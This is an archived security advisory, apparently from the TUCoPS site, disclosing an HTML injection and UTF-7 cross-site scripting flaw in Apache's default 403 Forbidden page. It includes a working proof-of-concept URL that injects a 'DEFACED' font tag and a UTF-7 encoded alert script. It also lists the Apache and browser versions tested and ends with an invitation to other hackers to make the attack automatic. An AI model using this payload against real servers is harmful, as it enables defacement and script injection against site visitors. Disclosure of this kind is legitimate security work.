TUCoPS :: Web :: Apache :: bx3114.htm

Apache Server HTML Injection and UTF-7 XSS Vulnerability
Apache Server HTML Injection and UTF-7 XSS Vulnerability
Apache Server HTML Injection and UTF-7 XSS Vulnerability



Apache Server HTML Injection and UTF-7 XSS Vulnerability

This vulnerability was found by Yaniv Miron and Yossi Yakubov.
This vulnerability will allow an attacker to inject an XSS to any
Apache server that use the Forbidden 403 default page.

After injecting this string:
http://www.victim.com/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ%3Cfont%20size=50%3EDEFACED%3C!xc+ADw-script+AD4-alert('xss')+ADw-/script+AD4---//-- 

You will get a Forbidden 403 error message with an XSS alert.
This string is combined from HTML Injection and a XSS string coded in UTF-7.

This is only a PoC and because of that the browser should be in auto
select mode of encoding so it could use the UTF-7 encoding.

This attack had been tested on some Apache versions as 2.2.x and 1.3.x
and on some versions of FireFox up to version 2.0.0.x and in IE 6 and
7.

We leave it to other hackers to upgrade the attack and make it fully automatic.

Yaniv Miron aka "Lament".

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH